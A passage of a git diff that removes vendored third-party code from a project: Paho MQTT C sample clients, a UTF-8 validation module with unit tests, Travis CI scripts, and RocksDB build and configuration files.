-	myconnect(&client, &conn_opts);
-
-	buffer = malloc(opts.maxdatalen);
-
-	while (!toStop)
-	{
-		int data_len = 0;
-		int delim_len = 0;
-
-		delim_len = (int)strlen(opts.delimiter);
-		do
-		{
-			buffer[data_len++] = getchar();
-			if (data_len > delim_len)
-			{
-			/* printf("comparing %s %s\n", opts.delimiter, &buffer[data_len - delim_len]); */
-			if (strncmp(opts.delimiter, &buffer[data_len - delim_len], delim_len) == 0)
-				break;
-			}
-		} while (data_len < opts.maxdatalen);
-
-		if (opts.verbose)
-				printf("Publishing data of length %d\n", data_len);
-		rc = MQTTClient_publish(client, topic, data_len, buffer, opts.qos, opts.retained, NULL);
-		if (rc != 0)
-		{
-			myconnect(&client, &conn_opts);
-			rc = MQTTClient_publish(client, topic, data_len, buffer, opts.qos, opts.retained, NULL);
-		}
-		if (opts.qos > 0)
-			MQTTClient_yield();
-	}
-
-	printf("Stopping\n");
-
-	free(buffer);
-
-	MQTTClient_disconnect(client, 0);
-
- 	MQTTClient_destroy(&client);
-
-	return EXIT_SUCCESS;
-}
-
-void getopts(int argc, char** argv)
-{
-	int count = 2;
-
-	while (count < argc)
-	{
-		if (strcmp(argv[count], "--retained") == 0)
-			opts.retained = 1;
-		if (strcmp(argv[count], "--verbose") == 0)
-			opts.verbose = 1;
-		else if (strcmp(argv[count], "--qos") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "0") == 0)
-					opts.qos = 0;
-				else if (strcmp(argv[count], "1") == 0)
-					opts.qos = 1;
-				else if (strcmp(argv[count], "2") == 0)
-					opts.qos = 2;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--host") == 0)
-		{
-			if (++count < argc)
-				opts.host = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--port") == 0)
-		{
-			if (++count < argc)
-				opts.port = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--clientid") == 0)
-		{
-			if (++count < argc)
-				opts.clientid = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--username") == 0)
-		{
-			if (++count < argc)
-				opts.username = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--password") == 0)
-		{
-			if (++count < argc)
-				opts.password = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--maxdatalen") == 0)
-		{
-			if (++count < argc)
-				opts.maxdatalen = atoi(argv[count]);
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--delimiter") == 0)
-		{
-			if (++count < argc)
-				opts.delimiter = argv[count];
-			else
-				usage();
-		}
-		count++;
-	}
-
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/paho_cs_sub.c b/thirdparty/paho.mqtt.c/src/samples/paho_cs_sub.c
deleted file mode 100644
index 52fe9bc..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/paho_cs_sub.c
+++ /dev/null
@@ -1,270 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *    Ian Craggs - change delimiter option from char to string
- *    Guilherme Maciel Ferreira - add keep alive option
- *******************************************************************************/
-
-/*
-
- stdout subscriber
-
- compulsory parameters:
-
-  --topic topic to subscribe to
-
- defaulted parameters:
-
-	--host localhost
-	--port 1883
-	--qos 2
-	--delimiter \n
-	--clientid stdout-subscriber
-	--showtopics off
-	--keepalive 10
-
-	--userid none
-	--password none
-
-*/
-#include "MQTTClient.h"
-#include "MQTTClientPersistence.h"
-
-#include <stdio.h>
-#include <signal.h>
-#include <string.h>
-#include <stdlib.h>
-
-
-#if defined(WIN32)
-#define sleep Sleep
-#else
-#include <sys/time.h>
-#endif
-
-
-volatile int toStop = 0;
-
-
-struct opts_struct
-{
-	char* clientid;
-	int nodelimiter;
-	char* delimiter;
-	int qos;
-	char* username;
-	char* password;
-	char* host;
-	char* port;
-	int showtopics;
-	int keepalive;
-} opts =
-{
-	"stdout-subscriber", 0, "\n", 2, NULL, NULL, "localhost", "1883", 0, 10
-};
-
-
-void usage(void)
-{
-	printf("MQTT stdout subscriber\n");
-	printf("Usage: stdoutsub topicname <options>, where options are:\n");
-	printf("  --host <hostname> (default is %s)\n", opts.host);
-	printf("  --port <port> (default is %s)\n", opts.port);
-	printf("  --qos <qos> (default is %d)\n", opts.qos);
-	printf("  --delimiter <delim> (default is \\n)\n");
-	printf("  --clientid <clientid> (default is %s)\n", opts.clientid);
-	printf("  --username none\n");
-	printf("  --password none\n");
-	printf("  --showtopics <on or off> (default is on if the topic has a wildcard, else off)\n");
-	printf("  --keepalive <seconds> (default is %d seconds)\n", opts.keepalive);
-	exit(EXIT_FAILURE);
-}
-
-
-void myconnect(MQTTClient* client, MQTTClient_connectOptions* opts)
-{
-	int rc = 0;
-	if ((rc = MQTTClient_connect(*client, opts)) != 0)
-	{
-		printf("Failed to connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-void cfinish(int sig)
-{
-	signal(SIGINT, NULL);
-	toStop = 1;
-}
-
-void getopts(int argc, char** argv);
-
-int main(int argc, char** argv)
-{
-	MQTTClient client;
-	MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-	char* topic = NULL;
-	int rc = 0;
-	char url[100];
-
-	if (argc < 2)
-		usage();
-
-	topic = argv[1];
-
-	if (strchr(topic, '#') || strchr(topic, '+'))
-		opts.showtopics = 1;
-	if (opts.showtopics)
-		printf("topic is %s\n", topic);
-
-	getopts(argc, argv);
-	sprintf(url, "%s:%s", opts.host, opts.port);
-
-	rc = MQTTClient_create(&client, url, opts.clientid, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	signal(SIGINT, cfinish);
-	signal(SIGTERM, cfinish);
-
-	conn_opts.keepAliveInterval = opts.keepalive;
-	conn_opts.reliable = 0;
-	conn_opts.cleansession = 1;
-	conn_opts.username = opts.username;
-	conn_opts.password = opts.password;
-
-	myconnect(&client, &conn_opts);
-
-	rc = MQTTClient_subscribe(client, topic, opts.qos);
-
-	while (!toStop)
-	{
-		char* topicName = NULL;
-		int topicLen;
-		MQTTClient_message* message = NULL;
-
-		rc = MQTTClient_receive(client, &topicName, &topicLen, &message, 1000);
-		if (message)
-		{
-			if (opts.showtopics)
-				printf("%s\t", topicName);
-			if (opts.nodelimiter)
-				printf("%.*s", message->payloadlen, (char*)message->payload);
-			else
-				printf("%.*s%s", message->payloadlen, (char*)message->payload, opts.delimiter);
-			fflush(stdout);
-			MQTTClient_freeMessage(&message);
-			MQTTClient_free(topicName);
-		}
-		if (rc != 0)
-			myconnect(&client, &conn_opts);
-	}
-
-	printf("Stopping\n");
-
-	MQTTClient_disconnect(client, 0);
-
-	MQTTClient_destroy(&client);
-
-	return EXIT_SUCCESS;
-}
-
-void getopts(int argc, char** argv)
-{
-	int count = 2;
-
-	while (count < argc)
-	{
-		if (strcmp(argv[count], "--qos") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "0") == 0)
-					opts.qos = 0;
-				else if (strcmp(argv[count], "1") == 0)
-					opts.qos = 1;
-				else if (strcmp(argv[count], "2") == 0)
-					opts.qos = 2;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--host") == 0)
-		{
-			if (++count < argc)
-				opts.host = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--port") == 0)
-		{
-			if (++count < argc)
-				opts.port = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--clientid") == 0)
-		{
-			if (++count < argc)
-				opts.clientid = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--username") == 0)
-		{
-			if (++count < argc)
-				opts.username = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--password") == 0)
-		{
-			if (++count < argc)
-				opts.password = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--delimiter") == 0)
-		{
-			if (++count < argc)
-				opts.delimiter = argv[count];
-			else
-				opts.nodelimiter = 1;
-		}
-		else if (strcmp(argv[count], "--showtopics") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "on") == 0)
-					opts.showtopics = 1;
-				else if (strcmp(argv[count], "off") == 0)
-					opts.showtopics = 0;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--keepalive") == 0)
-		{
-			if (++count < argc)
-				opts.keepalive = atoi(argv[count]);
-			else
-				usage();
-		}
-		count++;
-	}
-
-}
diff --git a/thirdparty/paho.mqtt.c/src/utf-8.c b/thirdparty/paho.mqtt.c/src/utf-8.c
deleted file mode 100644
index 1530701..0000000
--- a/thirdparty/paho.mqtt.c/src/utf-8.c
+++ /dev/null
@@ -1,230 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-
-/**
- * @file
- * \brief Functions for checking that strings contain UTF-8 characters only
- *
- * See page 104 of the Unicode Standard 5.0 for the list of well formed
- * UTF-8 byte sequences.
- * 
- */
-#include "utf-8.h"
-
-#include <stdlib.h>
-#include <string.h>
-
-#include "StackTrace.h"
-
-/**
- * Macro to determine the number of elements in a single-dimension array
- */
-#if !defined(ARRAY_SIZE)
-#define ARRAY_SIZE(a) (sizeof(a) / sizeof(a[0]))
-#endif
-
-
-/**
- * Structure to hold the valid ranges of UTF-8 characters, for each byte up to 4
- */
-struct
-{
-	int len; /**< number of elements in the following array (1 to 4) */
-	struct
-	{
-		char lower; /**< lower limit of valid range */
-		char upper; /**< upper limit of valid range */
-	} bytes[4];   /**< up to 4 bytes can be used per character */
-}
-valid_ranges[] = 
-{
-		{1, { {00, 0x7F} } },
-		{2, { {0xC2, 0xDF}, {0x80, 0xBF} } },
-		{3, { {0xE0, 0xE0}, {0xA0, 0xBF}, {0x80, 0xBF} } },
-		{3, { {0xE1, 0xEC}, {0x80, 0xBF}, {0x80, 0xBF} } },
-		{3, { {0xED, 0xED}, {0x80, 0x9F}, {0x80, 0xBF} } },
-		{3, { {0xEE, 0xEF}, {0x80, 0xBF}, {0x80, 0xBF} } },
-		{4, { {0xF0, 0xF0}, {0x90, 0xBF}, {0x80, 0xBF}, {0x80, 0xBF} } },
-		{4, { {0xF1, 0xF3}, {0x80, 0xBF}, {0x80, 0xBF}, {0x80, 0xBF} } },
-		{4, { {0xF4, 0xF4}, {0x80, 0x8F}, {0x80, 0xBF}, {0x80, 0xBF} } },
-};
-
-
-static const char* UTF8_char_validate(int len, const char* data);
-
-
-/**
- * Validate a single UTF-8 character
- * @param len the length of the string in "data"
- * @param data the bytes to check for a valid UTF-8 char
- * @return pointer to the start of the next UTF-8 character in "data"
- */
-static const char* UTF8_char_validate(int len, const char* data)
-{
-	int good = 0;
-	int charlen = 2;
-	int i, j;
-	const char *rc = NULL;
-
-	FUNC_ENTRY;
-	/* first work out how many bytes this char is encoded in */
-	if ((data[0] & 128) == 0)
-		charlen = 1;
-	else if ((data[0] & 0xF0) == 0xF0)
-		charlen = 4;
-	else if ((data[0] & 0xE0) == 0xE0)
-		charlen = 3;
-
-	if (charlen > len)
-		goto exit;	/* not enough characters in the string we were given */
-
-	for (i = 0; i < ARRAY_SIZE(valid_ranges); ++i)
-	{ /* just has to match one of these rows */
-		if (valid_ranges[i].len == charlen)
-		{
-			good = 1;
-			for (j = 0; j < charlen; ++j)
-			{
-				if (data[j] < valid_ranges[i].bytes[j].lower ||
-						data[j] > valid_ranges[i].bytes[j].upper)
-				{
-					good = 0;  /* failed the check */
-					break;
-				}
-			}
-			if (good)
-				break;
-		}
-	}
-
-	if (good)
-		rc = data + charlen;
-	exit:
-	FUNC_EXIT;
-	return rc;
-}
-
-
-/**
- * Validate a length-delimited string has only UTF-8 characters
- * @param len the length of the string in "data"
- * @param data the bytes to check for valid UTF-8 characters
- * @return 1 (true) if the string has only UTF-8 characters, 0 (false) otherwise
- */
-int UTF8_validate(int len, const char* data)
-{
-	const char* curdata = NULL;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (len == 0)
-	{
-		rc = 1;
-		goto exit;
-	}
-	curdata = UTF8_char_validate(len, data);
-	while (curdata && (curdata < data + len))
-		curdata = UTF8_char_validate(len, curdata);
-
-	rc = curdata != NULL;
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Validate a null-terminated string has only UTF-8 characters
- * @param string the string to check for valid UTF-8 characters
- * @return 1 (true) if the string has only UTF-8 characters, 0 (false) otherwise
- */
-int UTF8_validateString(const char* string)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	rc = UTF8_validate((int)strlen(string), string);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-#if defined(UNIT_TESTS)
-#include <stdio.h>
-
-typedef struct
-{
-	int len;
-	char data[20];
-} tests;
-
-tests valid_strings[] =
-{
-		{3, "hjk" },
-		{7, {0x41, 0xE2, 0x89, 0xA2, 0xCE, 0x91, 0x2E} },
-		{3, {'f', 0xC9, 0xB1 } },
-		{9, {0xED, 0x95, 0x9C, 0xEA, 0xB5, 0xAD, 0xEC, 0x96, 0xB4} },
-		{9, {0xE6, 0x97, 0xA5, 0xE6, 0x9C, 0xAC, 0xE8, 0xAA, 0x9E} },
-		{4, {0x2F, 0x2E, 0x2E, 0x2F} },
-		{7, {0xEF, 0xBB, 0xBF, 0xF0, 0xA3, 0x8E, 0xB4} },
-};
-
-tests invalid_strings[] =
-{
-		{2, {0xC0, 0x80} },
-		{5, {0x2F, 0xC0, 0xAE, 0x2E, 0x2F} },
-		{6, {0xED, 0xA1, 0x8C, 0xED, 0xBE, 0xB4} },
-		{1, {0xF4} },
-};
-
-int main (int argc, char *argv[])
-{
-	int i, failed = 0;
-
-	for (i = 0; i < ARRAY_SIZE(valid_strings); ++i)
-	{
-		if (!UTF8_validate(valid_strings[i].len, valid_strings[i].data))
-		{
-			printf("valid test %d failed\n", i);
-			failed = 1;
-		}
-		else
-			printf("valid test %d passed\n", i);
-	}
-
-	for (i = 0; i < ARRAY_SIZE(invalid_strings); ++i)
-	{
-		if (UTF8_validate(invalid_strings[i].len, invalid_strings[i].data))
-		{
-			printf("invalid test %d failed\n", i);
-			failed = 1;
-		}
-		else
-			printf("invalid test %d passed\n", i);
-	}
-
-	if (failed)
-		printf("Failed\n");
-	else
-		printf("Passed\n");
-
-	return 0;
-} /* End of main function*/
-
-#endif
-
diff --git a/thirdparty/paho.mqtt.c/src/utf-8.h b/thirdparty/paho.mqtt.c/src/utf-8.h
deleted file mode 100644
index 8bce4b3..0000000
--- a/thirdparty/paho.mqtt.c/src/utf-8.h
+++ /dev/null
@@ -1,23 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-#if !defined(UTF8_H)
-#define UTF8_H
-
-int UTF8_validate(int len, const char *data);
-int UTF8_validateString(const char* string);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/travis-build.sh b/thirdparty/paho.mqtt.c/travis-build.sh
deleted file mode 100755
index 5356f8b..0000000
--- a/thirdparty/paho.mqtt.c/travis-build.sh
+++ /dev/null
@@ -1,15 +0,0 @@
-#!/bin/bash
-
-set -e
-
-rm -rf build.paho
-mkdir build.paho
-cd build.paho
-echo "travis build dir $TRAVIS_BUILD_DIR pwd $PWD"
-cmake -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_DOCUMENTATION=FALSE -DPAHO_BUILD_SAMPLES=TRUE ..
-make
-python ../test/mqttsas2.py &
-ctest -VV --timeout 600
-kill %1
-killall mosquitto
-
diff --git a/thirdparty/paho.mqtt.c/travis-env-vars b/thirdparty/paho.mqtt.c/travis-env-vars
deleted file mode 100644
index 2551ccb..0000000
--- a/thirdparty/paho.mqtt.c/travis-env-vars
+++ /dev/null
@@ -1,2 +0,0 @@
-export TRAVIS_OS_NAME=linux
-export TRAVIS_BUILD_DIR=$PWD
diff --git a/thirdparty/paho.mqtt.c/travis-install.sh b/thirdparty/paho.mqtt.c/travis-install.sh
deleted file mode 100755
index 0405da6..0000000
--- a/thirdparty/paho.mqtt.c/travis-install.sh
+++ /dev/null
@@ -1,18 +0,0 @@
-#!/bin/bash
-
-if [ "$TRAVIS_OS_NAME" == "linux" ]; then
-	pwd
-	sudo service mosquitto stop
-	# Stop any mosquitto instance which may be still running from previous runs
-	killall mosquitto
-	mosquitto -h
-	mosquitto -c test/tls-testing/mosquitto.conf &
-fi
-
-if [ "$TRAVIS_OS_NAME" == "osx" ]; then
-	pwd
-	brew update
-	brew install openssl mosquitto
-	brew services stop mosquitto
-	/usr/local/sbin/mosquitto -c test/tls-testing/mosquitto.conf &
-fi
diff --git a/thirdparty/paho.mqtt.c/travis-macos-vars b/thirdparty/paho.mqtt.c/travis-macos-vars
deleted file mode 100644
index bbdbccb..0000000
--- a/thirdparty/paho.mqtt.c/travis-macos-vars
+++ /dev/null
@@ -1,2 +0,0 @@
-export TRAVIS_OS_NAME=osx
-export TRAVIS_BUILD_DIR=$PWD
diff --git a/thirdparty/rocksdb/.clang-format b/thirdparty/rocksdb/.clang-format
deleted file mode 100644
index 7c27981..0000000
--- a/thirdparty/rocksdb/.clang-format
+++ /dev/null
@@ -1,5 +0,0 @@
-# Complete list of style options can be found at: 
-# http://clang.llvm.org/docs/ClangFormatStyleOptions.html
----
-BasedOnStyle: Google
-...
diff --git a/thirdparty/rocksdb/.gitignore b/thirdparty/rocksdb/.gitignore
deleted file mode 100644
index 03b8059..0000000
--- a/thirdparty/rocksdb/.gitignore
+++ /dev/null
@@ -1,74 +0,0 @@
-make_config.mk
-
-*.a
-*.arc
-*.d
-*.dylib*
-*.gcda
-*.gcno
-*.o
-*.so
-*.so.*
-*_test
-*_bench
-*_stress
-*.out
-*.class
-*.jar
-*.*jnilib*
-*.d-e
-*.o-*
-*.swp
-*~
-*.vcxproj
-*.vcxproj.filters
-*.sln
-*.cmake
-CMakeCache.txt
-CMakeFiles/
-build/
-
-ldb
-manifest_dump
-sst_dump
-blob_dump
-column_aware_encoding_exp
-util/build_version.cc
-build_tools/VALGRIND_LOGS/
-coverage/COVERAGE_REPORT
-.gdbhistory
-.gdb_history
-package/
-unity.a
-tags
-etags
-rocksdb_dump
-rocksdb_undump
-db_test2
-
-java/out
-java/target
-java/test-libs
-java/*.log
-java/include/org_rocksdb_*.h
-
-.idea/
-*.iml
-
-rocksdb.cc
-rocksdb.h
-unity.cc
-java/crossbuild/.vagrant
-.vagrant/
-java/**/*.asc
-java/javadoc
-
-scan_build_report/
-t
-LOG
-
-db_logs/
-tp2/
-fbcode/
-fbcode
-buckifier/*.pyc
diff --git a/thirdparty/rocksdb/.travis.yml b/thirdparty/rocksdb/.travis.yml
deleted file mode 100644
index b76973d..0000000
--- a/thirdparty/rocksdb/.travis.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-sudo: false
-dist: trusty
-language: cpp
-os:
-  - linux
-  - osx
-compiler:
-  - clang
-  - gcc
-osx_image: xcode8.3
-jdk:
-  - oraclejdk7
-cache:
-  - ccache
-  - apt
-
-addons:
-   apt:
-      packages: ['zlib1g-dev', 'libbz2-dev', 'libsnappy-dev', 'curl', 'libgflags-dev', 'mingw-w64']
-env:
-  - TEST_GROUP=platform_dependent # 16-18 minutes
-  - TEST_GROUP=1 # 33-35 minutes
-  - TEST_GROUP=2 # 30-32 minutes
-  # Run java tests
-  - JOB_NAME=java_test # 4-11 minutes
-  # Build ROCKSDB_LITE
-  - JOB_NAME=lite_build # 3-4 minutes
-  # Build examples
-  - JOB_NAME=examples # 5-7 minutes
-  - JOB_NAME=cmake # 3-5 minutes
-  - JOB_NAME=cmake-mingw # 3 minutes
-
-matrix:
-  exclude:
-  - os: osx
-    env: TEST_GROUP=1
-  - os: osx
-    env: TEST_GROUP=2
-  - os : osx
-    env: JOB_NAME=cmake-mingw
-  - os : linux
-    compiler: clang
-  - os : osx
-    compiler: gcc
-
-# https://docs.travis-ci.com/user/caching/#ccache-cache
-install:
-  - if [ "${TRAVIS_OS_NAME}" == osx ]; then
-      brew install ccache;
-      PATH=$PATH:/usr/local/opt/ccache/libexec;
-    fi
-
-before_script:
-  # Increase the maximum number of open file descriptors, since some tests use
-  # more FDs than the default limit.
-  - ulimit -n 8192
-
-script:
-  - ${CXX} --version
-  - if [ "${TEST_GROUP}" == 'platform_dependent' ]; then ccache -C && OPT=-DTRAVIS V=1 ROCKSDBTESTS_END=db_block_cache_test make -j4 all_but_some_tests check_some; fi
-  - if [ "${TEST_GROUP}" == '1' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=db_block_cache_test ROCKSDBTESTS_END=comparator_db_test make -j4 check_some; fi
-  - if [ "${TEST_GROUP}" == '2' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=comparator_db_test make -j4 check_some; fi
-  - if [ "${JOB_NAME}" == 'java_test' ]; then OPT=-DTRAVIS V=1 make clean jclean && make rocksdbjava jtest; fi
-  - if [ "${JOB_NAME}" == 'lite_build' ]; then OPT="-DTRAVIS -DROCKSDB_LITE" V=1 make -j4 static_lib tools; fi
-  - if [ "${JOB_NAME}" == 'examples' ]; then OPT=-DTRAVIS V=1 make -j4 static_lib; cd examples; make -j4; fi
-  - if [ "${JOB_NAME}" == 'cmake' ]; then mkdir build && cd build && cmake .. && make -j4 rocksdb; fi
-  - if [ "${JOB_NAME}" == 'cmake-mingw' ]; then mkdir build && cd build && cmake .. -DCMAKE_C_COMPILER=x86_64-w64-mingw32-gcc -DCMAKE_CXX_COMPILER=x86_64-w64-mingw32-g++ -DCMAKE_SYSTEM_NAME=Windows && make -j4 rocksdb; fi
-notifications:
-    email:
-      - leveldb@fb.com
-    webhooks:
-      - https://buildtimetrend.herokuapp.com/travis
diff --git a/thirdparty/rocksdb/AUTHORS b/thirdparty/rocksdb/AUTHORS
deleted file mode 100644
index e644f55..0000000
--- a/thirdparty/rocksdb/AUTHORS
+++ /dev/null
@@ -1,11 +0,0 @@
-Facebook Inc.
-Facebook Engineering Team
-
-Google Inc.
-# Initial version authors:
-Jeffrey Dean <jeff@google.com>
-Sanjay Ghemawat <sanjay@google.com>
-
-# Partial list of contributors:
-Kevin Regan <kevin.d.regan@gmail.com>
-Johan Bilien <jobi@litl.com>
diff --git a/thirdparty/rocksdb/CMakeLists.txt b/thirdparty/rocksdb/CMakeLists.txt
deleted file mode 100644
index 4b1481c..0000000
--- a/thirdparty/rocksdb/CMakeLists.txt
+++ /dev/null
@@ -1,908 +0,0 @@
-# Prerequisites for Windows:
-#     This cmake build is for Windows 64-bit only.
-#
-# Prerequisites:
-#     You must have at least Visual Studio 2015 Update 3. Start the Developer Command Prompt window that is a part of Visual Studio installation.
-#     Run the build commands from within the Developer Command Prompt window to have paths to the compiler and runtime libraries set.
-#     You must have git.exe in your %PATH% environment variable.
-#
-# To build Rocksdb for Windows is as easy as 1-2-3-4-5:
-#
-# 1. Update paths to third-party libraries in thirdparty.inc file
-# 2. Create a new directory for build artifacts
-#        mkdir build
-#        cd build
-# 3. Run cmake to generate project files for Windows, add more options to enable required third-party libraries.
-#    See thirdparty.inc for more information.
-#        sample command: cmake -G "Visual Studio 14 Win64" -DGFLAGS=1 -DSNAPPY=1 -DJEMALLOC=1 -DJNI=1 ..
-# 4. Then build the project in debug mode (you may want to add /m[:<N>] flag to run msbuild in <N> parallel threads
-#                                          or simply /m ot use all avail cores)
-#        msbuild rocksdb.sln
-#
-#        rocksdb.sln build features exclusions of test only code in Release. If you build ALL_BUILD then everything
-#        will be attempted but test only code does not build in Release mode.
-#
-# 5. And release mode (/m[:<N>] is also supported)
-#        msbuild rocksdb.sln /p:Configuration=Release
-#
-# Linux:
-#
-# 1. Install a recent toolchain such as devtoolset-3 if you're on a older distro. C++11 required.
-# 2. mkdir build; cd build
-# 3. cmake ..
-# 4. make -j
-
-cmake_minimum_required(VERSION 2.6)
-project(rocksdb)
-
-if(POLICY CMP0042)
-  cmake_policy(SET CMP0042 NEW)
-endif()
-
-list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/modules/")
-
-option(WITH_JEMALLOC "build with JeMalloc" OFF)
-if(MSVC)
-  include(${CMAKE_CURRENT_SOURCE_DIR}/thirdparty.inc)
-else()
-  if(CMAKE_SYSTEM_NAME MATCHES "FreeBSD")
-    # FreeBSD has jemaloc as default malloc
-    # but it does not have all the jemalloc files in include/...
-    set(WITH_JEMALLOC ON)
-  else()
-    if(WITH_JEMALLOC)
-      find_package(JeMalloc REQUIRED)
-      add_definitions(-DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE)
-      include_directories(${JEMALLOC_INCLUDE_DIR})
-    endif()
-  endif()
-
-  option(WITH_SNAPPY "build with SNAPPY" OFF)
-  if(WITH_SNAPPY)
-    find_package(snappy REQUIRED)
-    add_definitions(-DSNAPPY)
-    include_directories(${SNAPPY_INCLUDE_DIR})
-    list(APPEND THIRDPARTY_LIBS ${SNAPPY_LIBRARIES})
-  endif()
-
-  option(WITH_ZLIB "build with zlib" OFF)
-  if(WITH_ZLIB)
-    find_package(zlib REQUIRED)
-    add_definitions(-DZLIB)
-    include_directories(${ZLIB_INCLUDE_DIR})
-    list(APPEND THIRDPARTY_LIBS ${ZLIB_LIBRARIES})
-  endif()
-
-  option(WITH_BZ2 "build with bzip2" OFF)
-  if(WITH_BZ2)
-    find_package(bzip2 REQUIRED)
-    add_definitions(-DBZIP2)
-    include_directories(${BZIP2_INCLUDE_DIR})
-    list(APPEND THIRDPARTY_LIBS ${BZIP2_LIBRARIES})
-  endif()
-
-  option(WITH_LZ4 "build with lz4" OFF)
-  if(WITH_LZ4)
-    find_package(lz4 REQUIRED)
-    add_definitions(-DLZ4)
-    include_directories(${LZ4_INCLUDE_DIR})
-    list(APPEND THIRDPARTY_LIBS ${LZ4_LIBRARIES})
-  endif()
-
-  option(WITH_ZSTD "build with zstd" OFF)
-  if(WITH_ZSTD)
-    find_package(zstd REQUIRED)
-    add_definitions(-DZSTD)
-    include_directories(${ZSTD_INCLUDE_DIR})
-    list(APPEND THIRDPARTY_LIBS ${ZSTD_LIBRARIES})
-  endif()
-endif()
-
-if(WIN32)
-  execute_process(COMMAND powershell -noprofile -Command "Get-Date -format MM_dd_yyyy" OUTPUT_VARIABLE DATE)
-  execute_process(COMMAND powershell -noprofile -Command "Get-Date -format HH:mm:ss" OUTPUT_VARIABLE TIME)
-  string(REGEX REPLACE "(..)_(..)_..(..).*" "\\1/\\2/\\3" DATE "${DATE}")
-  string(REGEX REPLACE "(..):(.....).*" " \\1:\\2" TIME "${TIME}")
-  set(GIT_DATE_TIME "${DATE} ${TIME}")
-else()
-  execute_process(COMMAND date "+%Y/%m/%d %H:%M:%S" OUTPUT_VARIABLE DATETIME)
-  string(REGEX REPLACE "\n" "" DATETIME ${DATETIME})
-  set(GIT_DATE_TIME "${DATETIME}")
-endif()
-
-find_package(Git)
-
-if(GIT_FOUND AND EXISTS "${CMAKE_CURRENT_SOURCE_DIR}/.git")
-  if(WIN32)
-    execute_process(COMMAND $ENV{COMSPEC} /C ${GIT_EXECUTABLE} -C ${CMAKE_CURRENT_SOURCE_DIR} rev-parse HEAD OUTPUT_VARIABLE GIT_SHA)
-  else()
-    execute_process(COMMAND ${GIT_EXECUTABLE} -C ${CMAKE_CURRENT_SOURCE_DIR} rev-parse HEAD OUTPUT_VARIABLE GIT_SHA)
-  endif()
-else()
-  set(GIT_SHA 0)
-endif()
-
-string(REGEX REPLACE "[^0-9a-f]+" "" GIT_SHA "${GIT_SHA}")
-
-if(NOT WIN32)
-  execute_process(COMMAND
-      "./build_tools/version.sh" "full"
-      WORKING_DIRECTORY ${PROJECT_SOURCE_DIR}
-      OUTPUT_VARIABLE ROCKSDB_VERSION
-  )
-  string(STRIP "${ROCKSDB_VERSION}" ROCKSDB_VERSION)
-  execute_process(COMMAND
-      "./build_tools/version.sh" "major"
-      WORKING_DIRECTORY ${PROJECT_SOURCE_DIR}
-      OUTPUT_VARIABLE ROCKSDB_VERSION_MAJOR
-  )
-  string(STRIP "${ROCKSDB_VERSION_MAJOR}" ROCKSDB_VERSION_MAJOR)
-endif()
-
-option(WITH_MD_LIBRARY "build with MD" ON)
-if(WIN32 AND MSVC)
-  if(WITH_MD_LIBRARY)
-    set(RUNTIME_LIBRARY "MD")
-  else()
-    set(RUNTIME_LIBRARY "MT")
-  endif()
-endif()
-
-set(BUILD_VERSION_CC ${CMAKE_BINARY_DIR}/build_version.cc)
